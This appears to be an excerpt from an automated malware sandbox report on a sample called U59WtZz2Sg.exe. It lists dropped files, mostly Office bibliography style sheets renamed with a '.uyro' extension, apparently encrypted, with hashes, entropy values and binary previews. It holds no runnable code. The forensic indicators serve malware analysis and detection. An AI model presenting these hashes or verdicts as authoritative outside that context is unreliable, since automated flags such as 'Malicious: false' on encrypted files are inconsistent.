Preview:	<?xml...$7U..X..5.1D3.g.f...b0-.y..kd.08..C.,qW..f.z..a...>Hr..D.....2Mh.2....U..A..6...o..F.....0.....,.f.R..\.?..q.....K.@p../.;<......4..\#.."O.........Y= d)..S...0.&.>q...\4{\md3^,..h9h.._.`....F\|..`.u...C....iP.i#`>.'....rkG....\|d.b...M.../5.8,7....i).....mFw..r^...(4...}c....%.w...!\.[...Kfb0.8...._..G.b....h.....\b...-..e.g=..#3I.>EJ.....f5..U.L..<.z.Sv..`k.!xg#...\|..K..o]..-.....k..h.f&'g[./)..f.`..+<.S.f>EuZ...O..2>\|..G..@L.-....L.tI...y..68.......}.u.!.M#.Z.e..-?...k.".e...~c.........7...;.jHxZ.wO.lwSD.....O.].\S......\|..3\..IO.!.r..e8.....,..........."Oz.p.X.L....I.....0.."..j......@S..I...:.cBG..rs......aAy..A.5a.N.A_...<..N...bm.oS.o.D.JwO...n..,......l..z;..2..(#............m....@.....X{...... ..r.#%....../.b..Z;...".s.......{j.W..~...(\OG...=..4$.k...+g...$b..v.Jil....'$.....M5...P.9V.W.{Rl.H.:.&..H.YqQ.O..1.gAO.I...x...Q\|..l<..G........0...(......I........{.,.....^.'!.4eB...o......cy.p1&...... 0....AIw.F.-bM$.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1870
Entropy (8bit):	7.866716233693577
Encrypted:	false
SSDEEP:	48:bfw2CJi5jkffM3FMzX7ie2+MSnF6PkqwIhUvfyF2X2D:bfwrJi5jkf03qzrozOTqLEg2Xu
MD5:	ED57A7FDDA650E5597BA7FE7DD0893F8
SHA1:	A2E1D9E91C21F18C42CA300375F930D7C11D00A5
SHA-256:	0CBD5FDFFCA140398760AAD649F0CE41181BB3220406B2C6C07780CD5976CEE3
SHA-512:	79F3F6EAA9B1CC52C3FFBBF37FC03ABB305A3D9A44B4418039344077C714D3F8ADBFB9237D1A5D6BE551B509D1343774592A4D857EA924B3A7F7AF8E0FC36D4D
Malicious:	false
Reputation:	unknown
Preview:	....r%....j.#..8..,....3.......q..p...=...(.q,.@..U..%D.L\G..$..+..#.L.p.9.F......;..A6<...fm.$..3O@.!.x...:u%...5pT..\|t..k.A.6..8R.....Hdi.cu..2>5....5...UG...'..8(#.._.>.!5k.....!Er...B]}J\..P.\%.)?..h...Y0..]...:.wY....Z..q.6.X......F(.F.lH..PeDO.kW..F.O.B..u...}.N Uk.L.C.x.....`kw.7%+U1"..H.?.P..<..t.@.2.f......}..!.0T=...>.(z..).+.).._l....m0....5.da.6.VZ..C..[t.&...=G........^.8...J=.V..-(L'..WG.....6...k......fm.78.f.F......e..4..R[.'..4.....#....;....sP4)j.^.T..........h].p.zF....G......z&.{... .G...._.g...D...7L..c2..p..A..C.6..}.k..[uGj.....37......u1')P..".....B.......{...p.J6.>....O.\|....[.%.jI-[.0.,:y...b-....U....V.....F.Y.......oF.wo2....>.&._=...2.....y..4,.m...zk.~.S=Zj.P}S.W..g.8..X`.=o.42..!...l..U.;..F.J...t&.{.6tdY..)...<f.()....HnPK....`.......6...60.].......Px.Y.3...6.....9..5.0.5.?Lr-W...#...nxZ..4.c...&"....8..7...{..2.iI<_'../:U.X.....2&......J..aFW.L..s..E.....;.L.vv~.v./...;...IC{.A.G8..V...S7.Gy.&.W..H...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5966
Entropy (8bit):	7.968103862579587
Encrypted:	false
SSDEEP:	96:FftKT9gzGAnDsr/9GNH5yzlCwfymxHXPVu7TNdU1JEZjDB493Vwpp4snbb7bsOm3:FkTizJDeAbsswfaXULMjDB4jwppPb7wP
MD5:	5D551FB9675924CFD1627521650FB7D3
SHA1:	4BBCAED9ED3F766EAB8742233C798F1F339DA6F1
SHA-256:	A4B51D9143CC731064A8F7A4566821D841B4830E12C7902918502913442E0221
SHA-512:	5C9AB186CC7D80B5926CAFCAC4966A2BA7323D79B31CAC9993B97A1D2E2CE617D784D7F658991A7D3044FC83FDA010DC5C155FFE7067C65B39F7BB99EE9F4B16
Malicious:	false
Reputation:	unknown
Preview:	....!.-.1..}yE.9Y..D^.._..coO0.uH....h.V....->Q....q.z......i...Qk..>.;...e.D.3.:.8..7/D.+Jp.....:{6....Pt.7..r?..W[.Qn).'.K.}..k.....;.1.....9.8.u .....EiL..6...^:....d..X@....p&\.......{.i...%..\.......6P...L.<2M.,,...)...,).........~...f..v\|..D@....h.g...n..s}.SW.O.(....V..,......5%.M..6.......C...9.&.'/.Q!...W.#Z..EV.>.0.....8_..U...d.../."r..O..`Bq.\|3(cC..;..t.HU......5....1l.~-......V......C...c....J.DHS.........q..[H.N?v%.3.?&.5...\.B.....u..I.........k.m...(..WY..@.N%wK1.."....+.b..K.cB....B.j....p.s.Ozh.A..7....P.b.X#k..u...[..Z.].c<z......u.d4sI4y.E.K..P......$$...l..'.....JQ.N 3VH.....`..4E...<.....\|.e...k..l.(CL..Ao8.....1n.y..!.T.....<....@.....8...qd.&.#Cv........C...=......{E.\...R.O....k}...Y.k.&4...R.MZ...>.....(.k.q...T....:...5.9\|.[.$\...I....+`...a...\|..\a...z#.9..I.2.1..=.r.jhx.c...(....:.hZ...y..k......B'....k....J@.s.P.Z.......:L\|......s....(.2.........`.1.I.bx.......G.u/dM.e....kf .p.,.hn?.y......5T......L...

C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1383
Entropy (8bit):	7.860406376142274
Encrypted:	false
SSDEEP:	24:ocii2TuTMeJb8OMK/ItN0nT0UX+lZyGMV0eZ//sbD:MI8OMK/CvUul490eZ//mD
MD5:	26C6DAC0D3836BBF5B23F94AA4AFCD4B
SHA1:	681656652FB985C466B966053597693F172744B0
SHA-256:	D636E6D2A82FB03ECABE7EBAA0556873CB243F950F8C11F2FF503C27A12F3E03
SHA-512:	B57E34482CBC23743D8EE97FFDCBB3E56FE412F4C2C9EAFE745792D581B60E1E2CCF7CCE18BA756DD160CB05CA4981FF143A071F54F9CA5CD734E5F6A6BA6419
Malicious:	false
Reputation:	unknown
Preview:	L....4....e.,.3.ff.k......}.l.......R.....J....B..cat.......n.NhIM.Lk....6.6.c.#..>.&..9.......F...]..d.`...='.)...).p.gp...RW........YT..j..P........[...#...\|FDu/3mVRU[.../n.h...;W,.G..d..7~SW./.....R]...s..l.......).A.{]..s.5G........8j...;..N4.#.H}.#.....:.#l.2.....$.....f......g..zB...,.'....o.\:....=....}U!...H....'...U.....t..0.-..[.'Si..2A.<"..tE!.If......T..PL.&.....J..x<{..k0,.Ta.e..A...-.%9+.P.~...c{.. :ME.......>...[EuXs...0}n....b.%:.c..2.3....n...@+D.l...)?.....3.X."O.[=.w..,95...H.....0....kM..".=Y..3.N6..G....>X..a.....Bb...e.z.....!.[.p.g.3.jK.xX;..4..t.W#..v..U.......xo...l.......\|...J.[.c.X.J46..4...u..()..D...Q....I.(.:_..~.vt.S..I...O.U.!.."......X......s...p..o-..9.yW..6x..I..o=u.:o......mZv....4K.fiPY..4'c..I.........`..4.J GE.a...(.d`..S.Qh...<.X7mK.\.^.)k..;.Z...LI.^!._.V.c..c.....~J.G...~I/^A..b...7.%{p}.B...u$(.........!T........H...\.&.E..QC5].Y.].f[...z,-0...[50.q.4...@.8Rc.....?.".V..f.K:.F.....?.h..=..}E....

C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	341
Entropy (8bit):	7.262656928245754
Encrypted:	false
SSDEEP:	6:14uyfZvjKCRooGrxqTdUAlfsXd3mnVHY/ovZ86dkqmamF3bhB4GxntHcii96Z:ujKSmNqTaOKdmbRf0NXtcii9a
MD5:	2DAD5729F6EBD121A7A4325D9F0F657C
SHA1:	17DC444C392F68BD99A8CAE5251C43D5A469CCFB
SHA-256:	B025F29713B6E35981C8A9196689629682242EA1C60C82A0C9AC9B3C2FB271CA
SHA-512:	969EB90EBBF0DA82F6AEFF61B0B3E4AFF41D0A49BF6DBE279DB6D3D460FC31E20BDD4A41B3DFF6739782FE88806FC6DA717FCCD7B4C1904B386D0C97A409D83E
Malicious:	false
Reputation:	unknown
Preview:	deskt..w.....o.y#...7n......K+.w.;.R .Q..Ctm..zc.....B!.Yt......T...nO.q.t....>.)..J>...A~..'..eA.kx..X....A......g.6>&.eg>.+.-...Fx.H......k[=D..<c,..).K...`.~.bq.<......w.aE_.U..b.........A<....Q..+..v..u.:.\|.d\|/HS'.!.>`. .......Z...4hWB...../%\<6.1.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	JPEG image data
Category:	dropped
Size (bytes):	74330
Entropy (8bit):	7.997460013556795
Encrypted:	true
SSDEEP:	1536:v8oO5UG3WK/5/msI0FRcy82gQ51jGmY6DdYpgn4ksrnQeewsi:vPjU+s1n82T5hGJuds0ti
MD5:	C7BD32709F7F47866C4A7EB75B501220
SHA1:	56B43DF76A3CB6A0538FCF9B66398788DC1F35B7
SHA-256:	C40359C29791D772FE7FB89300EF451B1A9E7A24ABFA3FD7FC18DD35CCA12270
SHA-512:	7851FD6F4BFC89A376D6769D5472906D9F09BBC8E1A0CB934E3AE78BAA1D3D5C7D378C578AF72ABD7FC51E6F24613F82BC313A620A86CDF0F6F828C5EFBBC8F6
Malicious:	true
Reputation:	unknown
Preview:	.....$j.jQ..o][.=...C..._...]f...Z[V..r..n..~.....c.0...'.".p.....w......EB^...^.....B.J.\|F.iZ..m!..}.P..l$..)}{...3.}..6.........p'O.G...QT.+_...w%.....H.O....i.J.S........~gO..?....&...m;......".i...]N.>....'...6=..G,..\|.y..>@..b..V.....d....;.xN?{..........6V....3......0A.BPtq...X..i.3.obB..-Q.......l...}X!Ej.5ds..2.P...m.#&<.%...K.h<.......8W...,..e...].!7x..x..&.wB.&~....\|...#.......,.<hg&../...A...^[.Xs..].{.{.]S.&D...I.u...].9...$Z[.\|Frq..v..C.....A...H..:WY.N...o......a`..8.~Y..Rz.@\.6i1h...pXu..q..3..w..)..f.F.(.$.Io.....b...s.w"{I...J..0....s...y.....\|..C'.B.j......."..>..e..W.]k...J..N....HH..dr...;X.]8}......{...{.......S......T..}...5..A..FG....6..$..E....\|..f.g.}....K.Q.........]..6.K.G..]..Lr#.W.VA....$.Yh7JB..C._..e...s.....KG...y......m.....{4..h..Z.^.....+r.+....I#.b....`j&f3.\|<%}%..[...4.].J.VGGQ...........2x.)...#..P..=N.......H.B?.}I..*.+....'=\..7u^..R....m.`...j....CE.............7...........x......

C:\Users\user\Application Data\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	333936
Entropy (8bit):	6.804827065927328
Encrypted:	false
SSDEEP:	6144:s3R3k+zn0NfeYGSYyC/iO+e4wFRIIPrXzIeueYm+R079Sb++qLjn/U0BeqxTLz2m:s3hkbGSYB1
MD5:	12553D0155C32E58C68A6457485FB031
SHA1:	7B3F83BBCE9C2A0D4F30C21C5B67BD12C4627E0F
SHA-256:	79C16F2461D681D61F74FC4A7058FC2EE87E89FD3A1E8380D1DCA595FD38CFED
SHA-512:	FDC6DD7177223F7F0718F6F3A05037375FF32EEC4D109EB79D374123F81E69234D27A81A66305CBEAF0947AE822CE51BC87C41433E653E6335FB04A77DD7F3A0
Malicious:	false
Reputation:	unknown
Preview:	<?xml)....R..V.a.no{..0M.2.....AH`.(i.8:.4B......0.&...F......58.&.:o...9a...e1.p..r.5s07..Q...C}.....fm.7......<..R.y....h....GR..PF.........p2QOD...#.m....V7.........2A...i.^....f.$....l..G....m.#......B"....j..q....u.....L.345qNU...+Pm..6..`F.."-.~p.A/.Aq..m..g..P.\u..jx...F...4..(..aw..{0p....v..R~6....^_....(.Q...ui.N.xb..\..Q..d.b\..+.......5........PT]e.qea.....+.....u.0..sZ..Z.@.Q..7Z.....d0.\|...qu^.:........(.O.c3.k'.r.s.).Oi&v....2.'X(..7W..$..A@.mc..S8...'.4D..dK....:.Qo>.. i(....U>;.FB.Q..Q.-......N4?-9.Ve.OV)s.<.......P.\|-91.f....@..e.X.Y~.A......a.6..:N.-...7....%D...g.....D.K...;....w...t..?.y#.}..fA.P..]L....-...... ...........1..^M./...7l..9}A.p.<7 .*....3`..S..........H.\|....xA.@l.6[y...."]..<{.'...&...).....y.T~{..Rm.O.~.E.o.N+.Ix.p..g...y.... 6......h.J.....5..-.;...KW..R.8....m.Z...:t.V..b...X.......j;&..O...z.o.&j.]..M..D..T.}...T..M...3...........%.hlh..q.e.k.)D..Q.d1....W.+..i,.r....N^C....T.#..N.Y...qx''.0

C:\Users\user\Application Data\Microsoft\Bibliography\Style\CHICAGO.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	297351
Entropy (8bit):	7.172613074887606
Encrypted:	false
SSDEEP:	6144:emuKb+AKQ/GkhaVVGwXeguqU6o4Uqk5Z3Vd1csaikbfoVokaZzOrswo3LdIkiX44:dbVFkVVdlK4Q
MD5:	3E45F71C20B9B3D28A56FF38A230B3C7
SHA1:	6BA13FA9560C482DED2BC7D7DA549DBA66BEE773
SHA-256:	729635F3697238098DFE66D0728E515DB9DE570FDBE0E292D121F8139922C919
SHA-512:	810FD8179ABA1F4F512DB1BD9868455EEDE83AE33209D989ACD270B8BB9A392E038AF437388E5E31BDA8679EFEF6C319A39B68EAB5C9A384EAA55F4F300BC44F
Malicious:	false
Reputation:	unknown
Preview:	.<?.!..b....G=.1V /!.H..#-......a..W.....X..@......s.nLLCD..e.;y......_......<..(...]......)+....e].{.s.E..h.+.d..m.Y.R...G...{...+.;..T.Hd.......q.b\|I...)`..F.2>.0.......%....'..$....m.....l....C..ti..!m.?.Ty...v.&w1(#....Iq...g..F2..N,.....?..i. .7..H^d....v...7.....x2....Q.8.S......@..M+....\|(..E$`..c.6B.N.u<.5.:L..V.K.;c^.D..?..6.-..T.p.[h...L.A7.k9...'...._[.m.2...F.u..i...}.. m3.cDw....j.lH.!..U.z@ADH...-.P@.....G.@..]....HS...dn...E.U..X.......~...\.d...t...e..5x<.......M...G.p..RC.]K..^.YIxKX.=h....y.$.!.g....O..x...o.~c.{f.o.Z.k.D....H....=../.1Di.oi3.`..<b6.b~7...'......`....N5...t....<...8&.....l..)...i7/....z.Im..(.)....t...Fyk..,{.M....B.SyF ..\|{jW...J..b..q.....o...\/p7a..K..%..f.;P.%WKc.5....NQ....^.....;.I....jD.._xu.i.}.._>.....~.b]...."?6..FA...#..b...Ks]L.:.O?.+...P.....h..6.dx..Hz.4..>v..=.{..~. ........`w......,[49.d2?L....O..m.1W.?...ZfA....L....4..i..(s....m../%.Y.y.-.....z.RLG.z..h...0........

C:\Users\user\Application Data\Microsoft\Bibliography\Style\GB.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	269004
Entropy (8bit):	7.322146720772359
Encrypted:	false
SSDEEP:	6144:Hyx+YOTcvOWGzfoosrQG1ej/yQzSS1apSiQhHDOruvoVeMUwFgOMJjot1FyJSkSt:4IYvOxzbsj
MD5:	E79128D5DE13F8F8633971F81A3AE111
SHA1:	0610D7D6FB28581508AA654973C4915AD46070FA
SHA-256:	9A4088F6DA122E4F150E197E8437865E975DABF7DD9476BC1283F6C466ADBEC3
SHA-512:	2AC28474A993D7FC5E0E49E14E2D29FDAE1978950651832ED1072B2F71FB54D106F36A64E5C642A7938837565D166D85C663A96F7E91D619BE71D840C7F9C3C3
Malicious:	false
Reputation:	unknown
Preview:	<?xml..F.;C..5.V........4X...?.......B..o...a..j.......>c......?z..`.._J........I.V7?..Wz:......Ag.?...K.c\|....Y..^.f.]l.u.X$K.c..)~.o./.Zk;..\|....>..^....;..~ZR-V."..z~`.:.$...g.>..0..?...< 2..$6...X.AK~...N...F..jt....4%zJ.6mC....l....C.k.#.$..[..=./...ij.,....R.0...r.X..f........R..oy.....~..L.:^.q.+.....C6.3Fi.w..y.-wa&..f.....8..Z.....R..0.J..u.k..........,..!....U~./l..1..:.j.g..$....<iy.#.5.CaI..B.+.1....a..V.]..n..+Q...U.].........l.j.S. hF.M..kV.o!...v..#pn....?.@.7.....Y1.....A:.k..\|atQ.....Vr\....u.Ag.0i.k%%...QIf.%j.9...m..^..<^_....v...C=.Q.2.00..w.....y.S.h......(i.YG7..i..i.......?.5........./x..A)..d>=..4t.=.RQ...s...-b f..>g.I...Q.j...L3"..s,.+.....m.G=.m=.O.n6pW.%...]^A....[.......n......d..7..7...B...F?.."R.....P.s..*.c.26.]G.."I..Z....m)..bA.....V...1M>.....T...T...~..Qc...z.1.V/..a.N)..(6....V.b_.+.0..H.....d..xg.(..K.#..,T.X.X.ni...`..:......;#2J...%.......!....k.b..Ux.0.).. ...Z(...v.....b...w.....v.c.f.a...{P

C:\Users\user\Application Data\Microsoft\Bibliography\Style\GostName.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	256692
Entropy (8bit):	7.414018920605174
Encrypted:	false
SSDEEP:	6144:FfFggLHLJlKtq01aoGEsXvOsUfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkC:3ggLHLJlKvJGE8vOsDk
MD5:	0DD3826C236EDF67C00CDE426735FC2F
SHA1:	99B8466E61BA3E37B23B456258D8B20D3B2F3406
SHA-256:	F30D73FFD5692FB2093BE7AE53FD3DB5BFDD74B7BBF0C294DF1A1AC74513D49D
SHA-512:	4699910CF29DA70BE1B55A7A1D5F14AF9AB51E56475DA2DD35724DAEFF6DE2E6BB26D01B3DA666356FD7DB6CF0163B0ACC0B0C903FA93CDA8669D2A3D115A3D0
Malicious:	false
Reputation:	unknown
Preview:	<?xmlK;..;.#/F'Y.i.Y.9~#....p..IlFzr2..5..QY..>..5....r.e...d_:...B)..1.6.l.......~...m..N_.{.?7...xKq....3s#.d............6<..q!cbf&5j......7...K..R#.\......B..l4..V..A%mO&KD/;{6...7.,..i.'./e,...:...A).@lb.f.......Q<..25g=.)x......t..t\|.Q<...6...%k.z...E.\|..}I.?/.....]...V2............r...q8...M....7'...Y...O..>.......}....5wH....o.n....n.%7....@nJv...j./...S.YIg.w.Wp[dEQ...F.<-....a.Q....R..7S...x........#.s..\....D+{i..fm.M_t!u..J..m...N.......'1.P)y.`..o..+.&.....P..j.\S...y...h.'...]h.\.k.rx!.......N..j..._..^..@...-.... V...2..9\|...9.;^.U..GhlA........B.....)/.T.....p4'..Q.a.Rw.E.n. .:....~...-..l&7.z.t\|..w.\.O.....2].I..[oe..d-._..k..j",,fB.f...;y.7S...[.oZ.~}..pW\..<.#..mm....<.....,~&.-.>...P..L.\.3.$ss8.b3...K.%@..N...fr.k.A..6.......\\e...Zt........4.#..`.]..d.....*S.5.......k.qhm....T.QO..4w.....I].4..8.c.....Vvx....h..%...Bc.....OP..!.['_w.....i..K.....2.EOV.V.$.'0...lj.Jo..G03.$$3.......H.)....Fz.W....'6`w.fV..gbwI...P

C:\Users\user\Application Data\Microsoft\Bibliography\Style\GostTitle.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	251783
Entropy (8bit):	7.438285421458999
Encrypted:	false
SSDEEP:	6144:twuQNuoD0+VWmfJrE4wJfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1Xkaj:cNJbVWyrUhk
MD5:	E2B72B92ADBAEF0FCD142EB2A8A1E45F
SHA1:	FB809E33F35A5160216612A045E3AE3D0A156392
SHA-256:	7E3CBBCE3B18736FEA0118F8084EBA24EF2660DCE64C2F6E2328B42C8CBCC1F6
SHA-512:	C92BFC2CA57622E093EB1F08D87BAA3BB1BBA6B398A1BA67A1B32A17E4C30ECC233075A4C08BDFD3CF865F5D4D260F203358BDEBACEA3C56F9651B0BD9E28290
Malicious:	false
Reputation:	unknown
Preview:	<?xml.-.....#.Z0w...vN..Is...#.-c..r.f..0......v..hn6..^.f....x...t..T..4.+......7..1...Q.e.o88...4?.......w......X.YJ.........<+[e...)G~.....9D.:....k.VEj...xm..U......G.......).....y.dX@o\.<I.......b.5~..u.f.)......&...o...D7.).j..._.T. ......m..?M.<$. ..4..T..........o}...kCmSb..&.b..........P.z..\YB..vM..d.:.P.1.dh...J.....7^?F.{I........QY8RMs..{.^MvV.....#..'..l...ea.E.....0...A{....>8/6>..^.Z.g<..=#A>...b}..8K...I.....W..2C".F..;..cY.e.....B..........,......`.X.d..?.`.....V.Y...."....,..I=:...X7.%JJh.Zru...8....j....!..=_....w.(B..Wk.,...T...+.Y........X\C...".d.....Gj...;%it6.f.'`.....>.a..11z.<)x ..)..}.s.].[.-W...........c..\|._E...:...PJ.$Me...h.C..."...'.....!.....'.5L..b...9ka.s..2#I.....;.!p................+..L.>.?..iN.t.t.B.).>...fr.Vp?...I.S..u.d<z..R.&.0.0`..~.[.i.?=.....g.._.q..b;.]R...".o....*..V9X.B...~l...Q.5.V......,.....5A..D..<:q(p.:.% ....~.o5%..A....c$......a._ k.Ex.....ZtZ..m..Z......A[Cy.\{....S

C:\Users\user\Application Data\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	285136
Entropy (8bit):	7.262346922747161
Encrypted:	false
SSDEEP:	6144:KwpWeIvnlMGnW89smF5DyFQzCWlASxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27w:L5IvnlMlCs2o4lc
MD5:	3D0F4AD7391782DA88F858031488CCEE
SHA1:	CC2B8622A38D94C10BBAA51698DC2E5E3E60275F
SHA-256:	60A6F2F7C5F020A611B30A7CE8B49E29A9E548654D1496E916AB80F874979915
SHA-512:	535256EEAEA234802A1DA724695040A9986154262FC6588ECDB508DC611D5305262529518FD39AF85A40E4F2CA6656B5749B0EE2AD4FFE960BB3B6B9E6AABF22
Malicious:	false
Reputation:	unknown
Preview:	<?xml]..7..(..DO.HqZ.....Z......LW..4..=...6.>..g..WT.@......3G.3Sx.7..a..B.?..s..}..$.?1e\#..Bd...H]..Q......g...G...b3OB..v~.u!g....;.:....w.......1_$.-.!.. 6._...h2.^c......R....]?.L..9..<.O.-L.Z.........r.y.Bw...jP...[.I.)..^...`9...x.Tj.W.Kf..!.1..B.._AI.xq..J...jK.16..W..W.....4LX$P.2.}..... ~...)%`..d.%.a.B...{%.......D.@S..g....;b.L_......8...B".tN.\..X.G.....AM.o..6.-..N.7N....P......#.b..O.\...5-.v...g}.2..{.YTw;.X.:...^.e...%........0.,.n.0..R.....#r1...M. =..v..].;..".E......C....N..f8 ...1....3..:..^j%d.<.......45!.]y.W........_l...qb..Xw.C^...y.pO.....QT ...1..E.......C.......p....\J.\|&..FS......:z.7.T8....&@}OH...e..g...>.........h].....&.>...?.:$}J.\..Qk.RS......HV....D~.%....Mc..I.Q....S....G. 0.!.@e..t[J@..$....t...<BFJ...g.s....T..E...x.i.M.d.k.PZ..\....:....9.L?...........<......C...u.....t.....Xk..g..q&J..g..V..V.n`.\|.....S.I.7..[.6..i.=Z!i.`...-SzE<...>..u~C..V.D..\.O...W.....AEJ..Q.7%i...2q<....Zy.r..=..QS`...

C:\Users\user\Application Data\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	294859
Entropy (8bit):	7.180389065534566
Encrypted:	false
SSDEEP:	6144:8WVzdMUqV5lF2jzdH8Y3Uvz04hfhf7v3uH4NYYP4BpBaZTTSSamEUhbpPkLWPOIv:XVKUqxF0d9kz
MD5:	D658C4B4DC2646237D2973F95F619B92
SHA1:	8B288733FF836AF378FF4FF2F2A243350C77821B
SHA-256:	6867A6A768C752378A8D3B9A95C364C1CA8255EA99AA9933870017EF30796738
SHA-512:	9AABD275F4081DB28CDBE6CA131CEA6697A6B4709A68BA17D7CC9235EBF3402384B17A69DF3C93A60DBBDCAF0F5F1957A372E239D23AB46BDC90E2403D2B1FA9
Malicious:	false
Reputation:	unknown
Preview:	<?xmlL..0......;.E..%#....3..5.P..^.."!K.x.2....]...q...fk'...o...1@).?bo._,..E\|n+..u.S.....\`^n.V,Lb..K;.=.3YK..I....6..z..c.)...O...M...!..&..........80[.B..J.....%Z.Z[Vg..q...~.["-..+v.(.x...eYp...R.....bs0..J......]..yb2f.A.H}.uMv.:1.).'p..j.b.....P..6?.f..?.x.\Y...Zx..w........PZ.q$3N....;g..buO.!k+.%.H.6.......:.!W...aQ...z.....>...}X.m..........UjjV.%g.Ss....BT......Gk.......Z..I...""bs)J......t!-...4..Y.F.Vf..]rQ.!..Ol.b..Bl...u....2aG.4.D..\6~.....nz.ljw.f..".r..is....W..'.Q2 ....!E..,5.A..K.Fn.P...Zm.u..d../.....!.....$?..f.`...6......Y5..ru..r...9....^....n.L....UDM.......n.!.C...T...k.H.+#.h...8...t.<h..S.!..9.......S....'6.v....j...p...I...)7#+3..O...p.G{.....AR4..yR..].`..S~...l...4l0.s..]..P$..........\|.n....Y....x.".7...TUn..\.;.Mc..S.Y.oL.U."..../..Lx..B....Dk.O..#.......L!...^1...&....v.+.] ..O..a.=.....:..^..w..v....ty....v.5.....8..{...4.....$.zU..^k....+.........7.7SJ...$RD$...>....e...d...$.Hw.t.b3.".......\... .

C:\Users\user\Application Data\Microsoft\Bibliography\Style\ISO690.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	270976
Entropy (8bit):	7.312608734429095
Encrypted:	false
SSDEEP:	6144:4/mBL53DZzo4OTFNL4hLbM0Ng0d4Jsq7vImej/yQ4SS1apSiQhHDOruvoVeMUwFl:/BZ5gFVmLt3dV
MD5:	E3701C0C0831FDC2C1623C0A5758FBB7
SHA1:	061CC4EDAC01FAEC14580CC6B2F6AC9E0E6D18C8
SHA-256:	09DDAD8A3C8A216ACC0C6996F05B5A58937C180C8292478758524AD3C7CD11D4
SHA-512:	D84A39394955FDD597B0224F2EC760AC0E8F8927D6906C9DB7DD001CCAFD2778334F283DB2E1405D1877A0EF2E0AC4FBF34EB10491E2CC0F65C0D8F42F41ACC8
Malicious:	false
Reputation:	unknown
Preview:	<?xmlC-...)QYL......1D..2L\|{2...p..2..MDv.../.N...s.b...I}..j=v....Xe....\|A.....'.......B...Q..{.....F~.$]T3q}....$.......q...re...,.1.;}:.:...).Y...y..icmd..~F6zI...t.`}.x.....V]..?.bS,...e..2M.l....{.c6....rY./..&.A?..........3.......U....2.>fC.f...(..08T.\|\!/../.".`...3...?..../....F.....k#......[Q..q...k.k..>...J.9....Q..#.......A.,...+.n.:.+-..6....}H...u.3.....D.....{..5....%...>^.8.\.LB.(..2FZ..0L..........~.9W..l.....u....d..p+.0..J.lm...5+....lJ....=7... {..).,...kd.v.$.%..i.X.,..SNF....D.......F..=Z.tE.1E$......V...M....:.V....fjP.....H..X..(....nK^...:3lVW...cu.bN..;..c.;.&]6.....F.......u.*...P....lx...z.......UV....;...\.Gs..^)..3.W.2onF...........K....=...C.`..pK.;x..`.,..1.d9..."rh.S.JwAa^..G..q..4.7Q.pV.Y9.K.H'.qKEb.T....\/.......2B..b.$?F..{........l&_}..72.\|...W.#....;.N.h....rG.J0B.5'....T....1.`D R......\|\|..w;..."nM?G.....%.._G.!..P.K...}........=.o...=.;?0...........qL.[..........R....>.Q('.^..8...."H..

C:\Users\user\Application Data\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	217912
Entropy (8bit):	7.663802200569065
Encrypted:	false
SSDEEP:	6144:BxekXb5+vuNDuy9wIdQUmg9wZc2xymj/e8kQR3T+vtgA9opdXHl238jiK2hpU7MG:BxFfUTU/98Nj/e8kQ
MD5:	FFD1750D97291E429379A424A61C3FB7
SHA1:	BFDEFD9316BFE9150824188C591C4B753F002E5D
SHA-256:	A33771C582E90A572A58C78196A612D8CF5137E277ECD56369FB95AEFA7B652C
SHA-512:	5F5E48F4583BD7056265C3CE7991F298C1BC0644307BF3DB8F90E4E9E3D92E34861C7610505ABA2F4D4FB6FDE5FF7378DBD98BB99C52B07077E7F1C8E54C28A4
Malicious:	false
Reputation:	unknown
